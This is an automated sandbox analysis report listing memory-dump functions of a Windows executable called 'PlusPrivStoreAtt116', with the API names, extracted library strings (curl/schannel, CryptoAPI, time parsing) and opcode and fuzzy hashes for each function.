                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$Xbad_function_call@std@@
                                        • String ID: array$number overflow parsing '$object
                                        • API String ID: 958247072-579821726
                                        • Opcode ID: 7d08be5014e241e1996b359722984978a2474af68dff6998a59ef9cca349c1e5
                                        • Instruction ID: 013b15259325cde83905266dfd5828297d026caf9b814c2e58c884592e85558c
                                        • Opcode Fuzzy Hash: 7d08be5014e241e1996b359722984978a2474af68dff6998a59ef9cca349c1e5
                                        • Instruction Fuzzy Hash: 6032C062E18B8686EF10CB69D4843ED2761FF457A8F604235DA5D87ADADFBCE184C340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strchr$_strdupfopenfseekstrncmpstrtol
                                        • String ID: CurrentUser$schannel: Failed to import cert file %s, password is bad
                                        • API String ID: 4221717217-1887299029
                                        • Opcode ID: 046ae9396b9c5381c5eb35e0e58779f46924a88e9e3f65756152692471b5be5a
                                        • Instruction ID: abb01762a1a5759cdf58a1740680e896489972e2ff0ec3561cd99487e336a872
                                        • Opcode Fuzzy Hash: 046ae9396b9c5381c5eb35e0e58779f46924a88e9e3f65756152692471b5be5a
                                        • Instruction Fuzzy Hash: C4819F21B0974286FB598F22D8543BA2A90BF45BACF684135CE1E877D2EFBCE454D300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _errno$strtol
                                        • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT
                                        • API String ID: 3596500743-988243589
                                        • Opcode ID: a27ae542bc9c7f338d1e45ad8eab28fe8a94b20ee21e0465aef1e32ec5bb0263
                                        • Instruction ID: b07a551da446c2fb097f8524b08877f77fd9650ebc07e6998fb2312ee0c4ba19
                                        • Opcode Fuzzy Hash: a27ae542bc9c7f338d1e45ad8eab28fe8a94b20ee21e0465aef1e32ec5bb0263
                                        • Instruction Fuzzy Hash: 1EF1D572F186118AEB249F69D4402BC3BA1BF4479CF604235DE1EE77D6DEBCA8069740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyReleasememset
                                        • String ID: @
                                        • API String ID: 2041421932-2766056989
                                        • Opcode ID: 8dec24b2b28c854e2a512df026831b930f33e1a9c27e0228013d28694f948d07
                                        • Instruction ID: 98e73b0d83eb85082fa291b6fa6ebe93f24e668cf55c5bba02713c035412a7ef
                                        • Opcode Fuzzy Hash: 8dec24b2b28c854e2a512df026831b930f33e1a9c27e0228013d28694f948d07
                                        • Instruction Fuzzy Hash: 30315E3261978186EB60DF22E584A6A7B64FFC5B88F248135EF8D93A18CF7CD445DB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                        • String ID: %s (0x%08X)$%s - %s$SEC_E_BAD_PKGID
                                        • API String ID: 600764987-1052566392
                                        • Opcode ID: 2f4f5cac2e3c43b7562cef83c936687109589ef06298fa9f03c17c2dbd503f5a
                                        • Instruction ID: ef810ea742becf1b1dfc9bf92e2ad8f103b27f74bcffdef9769e012c34b8cf4e
                                        • Opcode Fuzzy Hash: 2f4f5cac2e3c43b7562cef83c936687109589ef06298fa9f03c17c2dbd503f5a
                                        • Instruction Fuzzy Hash: 5A317022A0D7C285EB629F21E5543BA7BA0FF85748F50053ADE8D82A96DF7CD544CB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                        • String ID: @
                                        • API String ID: 3606780921-2766056989
                                        • Opcode ID: 6136e2d2f60899814bedc5065155a8e394b868ebbd0571b5477ee51700c2f6b1
                                        • Instruction ID: dfd0fddbe0211bbc830954302e7d33341f0d6194267b0996c3813145fdcad58b
                                        • Opcode Fuzzy Hash: 6136e2d2f60899814bedc5065155a8e394b868ebbd0571b5477ee51700c2f6b1
                                        • Instruction Fuzzy Hash: CF21503261878186E7A08F11E454A6B7B61FFC9B88F545135EE8E43E58CF7CD545CB00
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                        • String ID:
                                        • API String ID: 313767242-0
                                        • Opcode ID: 44a6ae0cd8af2b98538bf3d6ef033a35be83f1fd2ab8966232449bb115425376
                                        • Instruction ID: aa3016c5fe3a334f0def630eb3fc1d24f090b6c8aad9dab8526f269c780e4ec3
                                        • Opcode Fuzzy Hash: 44a6ae0cd8af2b98538bf3d6ef033a35be83f1fd2ab8966232449bb115425376
                                        • Instruction Fuzzy Hash: 94313072608B818AEB609F60E8843ED7765FB88748F54403ADB4D87B94EFBCD648C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
                                        • String ID: @
                                        • API String ID: 3016261861-2766056989
                                        • Opcode ID: c3d7f55d531103b682a9b71d8043198a9a0fc1ead9b00ee7f1eeacd26531a0d2
                                        • Instruction ID: 3a1a98f4adc0ace30b8acea8a358eb8ae976716db176e370c408e7474e72108f
                                        • Opcode Fuzzy Hash: c3d7f55d531103b682a9b71d8043198a9a0fc1ead9b00ee7f1eeacd26531a0d2
                                        • Instruction Fuzzy Hash: 7541AD22B046A08EF7108BB6E4547EE3FB1FB5A748F044025DE9957A9ACF3CD11AD750
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                        • API String ID: 0-2102732564
                                        • Opcode ID: 434d816d5508b23ec8b761faf1e405e596b275a867fb9c915b7854e0c7215efd
                                        • Instruction ID: 07c89ae1930a4577adec8cdf53e24d41042283d27ff29bfbddd2d73440f50d23
                                        • Opcode Fuzzy Hash: 434d816d5508b23ec8b761faf1e405e596b275a867fb9c915b7854e0c7215efd
                                        • Instruction Fuzzy Hash: AB21CF50E19A4A53FF14CB96A800BF446608F44788FF10533E80E8A396DFFC7991D260
                                        APIs
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF602A00A9B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: DebugDebuggerErrorLastOutputPresentStringmemset
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 1848478996-631824599
                                        • Opcode ID: 637a213c1da88407680c04d78c1e61b8d1bedd6c31c7c0292ccceb778aad0452
                                        • Instruction ID: 2afc9f48e5326139d84501ee4009f9c2870690fd4cef167e9c4a7dd10d935111
                                        • Opcode Fuzzy Hash: 637a213c1da88407680c04d78c1e61b8d1bedd6c31c7c0292ccceb778aad0452
                                        • Instruction Fuzzy Hash: 3A115E32A14B42A7F7449B22DA9537937A4FF08749F604135CA4DC2A90EFBCE478C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: Crypt$Context$Release$AcquireRandom
                                        • String ID: @
                                        • API String ID: 2916321625-2766056989
                                        • Opcode ID: 0ac105aea5ba1d1cf2cff87d6f6bbec93b26db8ffee4d0c604fb4a7a731729df
                                        • Instruction ID: bb2f50d658f2f7048c47340233769575016483bc03355c0ab3eeb2344514c2b2
                                        • Opcode Fuzzy Hash: 0ac105aea5ba1d1cf2cff87d6f6bbec93b26db8ffee4d0c604fb4a7a731729df
                                        • Instruction Fuzzy Hash: 00F08661B0874182F7109F16F484726A761FF887D8F644430DE8D86669DEBDC4858B00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ld$(nil)$(nil)$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                        • API String ID: 0-1379995092
                                        • Opcode ID: 6fe4d5b75646ab6122b07eb1061459e9abcdc209cb5e48310bfdb0b9ebada0bf
                                        • Instruction ID: aa8f1845e029078a10034e88bdc0722f1b46af2909154368a35f899aa50f03e0
                                        • Opcode Fuzzy Hash: 6fe4d5b75646ab6122b07eb1061459e9abcdc209cb5e48310bfdb0b9ebada0bf
                                        • Instruction Fuzzy Hash: 43420532908A8A86E7648E1A95443796F91FF44F9CF704A30DE9EC76D6DEBCE9418700
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                        • String ID:
                                        • API String ID: 2933794660-0
                                        • Opcode ID: 041d678dc743e0e5f436598f64fc9b09e1e8aef45ebef0de337f34359adb3a07
                                        • Instruction ID: bbb12a4e3d73cd2b68d5b46e996ca2866598997528f2a98433702d834eb7aa19
                                        • Opcode Fuzzy Hash: 041d678dc743e0e5f436598f64fc9b09e1e8aef45ebef0de337f34359adb3a07
                                        • Instruction Fuzzy Hash: 7C111826B14B028AEB00CB60E8942A937B4FB59758F540E31DE6D86BA4DFB8D598C340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: Crypt$AcquireContextCreateHash
                                        • String ID: @
                                        • API String ID: 1914063823-2766056989
                                        • Opcode ID: 1b93c0d41da9f109d1acfa544d6c01e5a17770cfcf19a319a204773c3ebed238
                                        • Instruction ID: 259971bb7c4325495d158debe0ed8759829c474ce78e698986da12af32d5d4af
                                        • Opcode Fuzzy Hash: 1b93c0d41da9f109d1acfa544d6c01e5a17770cfcf19a319a204773c3ebed238
                                        • Instruction Fuzzy Hash: 11E09A22B24A5282F7208B21E845F166750EF88B8CF588031CE8C8AA18DF7CC08ACB04
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _getpidhtons
                                        • String ID:
                                        • API String ID: 3416910171-0
                                        • Opcode ID: 14fbe48617075f3174793a590dd64f28711d7743a1a480ca69b05c8c2bed0042
                                        • Instruction ID: e7579c67f08d0493b6fba259d988f8048d9d4f8ddf337add64f9d09ef238b051
                                        • Opcode Fuzzy Hash: 14fbe48617075f3174793a590dd64f28711d7743a1a480ca69b05c8c2bed0042
                                        • Instruction Fuzzy Hash: 54113C26A247D0CAD304CF75E5402AD37B0FB5CB88F14962AFB8987B59EB78D690C744
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: Xbad_function_call@std@@
                                        • String ID:
                                        • API String ID: 1029415015-0
                                        • Opcode ID: d85b1203621929becc78f717d9455c77eb8f9cc5392cf1a45e86bbadd8f8e732
                                        • Instruction ID: d766f1eb1ac5f70f8b8379d913e9214c201b2fad26d5287ce270bd69b7c62b7c
                                        • Opcode Fuzzy Hash: d85b1203621929becc78f717d9455c77eb8f9cc5392cf1a45e86bbadd8f8e732
                                        • Instruction Fuzzy Hash: 4481A362B19B9989EB01CB6AD0843BC3B70EB55B48F684436CF8D87796DF79D041C390
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23195db887e80f4d2cea8d575e2b125909b75d07273f377a0876d07e28769e32
                                        • Instruction ID: 67998c8ebd762bdf968fdbe768f84c27ac3abd438ac8689d3fafc844828624f1
                                        • Opcode Fuzzy Hash: 23195db887e80f4d2cea8d575e2b125909b75d07273f377a0876d07e28769e32
                                        • Instruction Fuzzy Hash: 33610672F09B8442DB14CB2AE44427D66A1EB597D8F209235DF5D87B89EF7DE141C340
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7ce16abf6dabfd6c05904dcfc4add426f37854a28f683b97e97ab74344d31e2
                                        • Instruction ID: 2d7d36e2a524e4494f4a8bed3429a22236dc376504f797c96727618c1a87f350
                                        • Opcode Fuzzy Hash: c7ce16abf6dabfd6c05904dcfc4add426f37854a28f683b97e97ab74344d31e2
                                        • Instruction Fuzzy Hash: 97419333B1155487E78CCE2AC8656AD33A2F799304F55C239EA0AC7785DE399905CB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9bc956564b332abba12e54d0044448655734ddf9d44365f360b093ba55ae5c6
                                        • Instruction ID: b699d937f217817b9e4c98feb7c54d99e488e4add7945baedc8998532c6f3708
                                        • Opcode Fuzzy Hash: a9bc956564b332abba12e54d0044448655734ddf9d44365f360b093ba55ae5c6
                                        • Instruction Fuzzy Hash: 28F08C25325767BEFE80893B4624FBD5E419BC0740FB36875CC80424CB8A9E5493D714
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 735474b44fecfb17f075a3ff19b93d187b15b809f496c8131696174fb3aa68e8
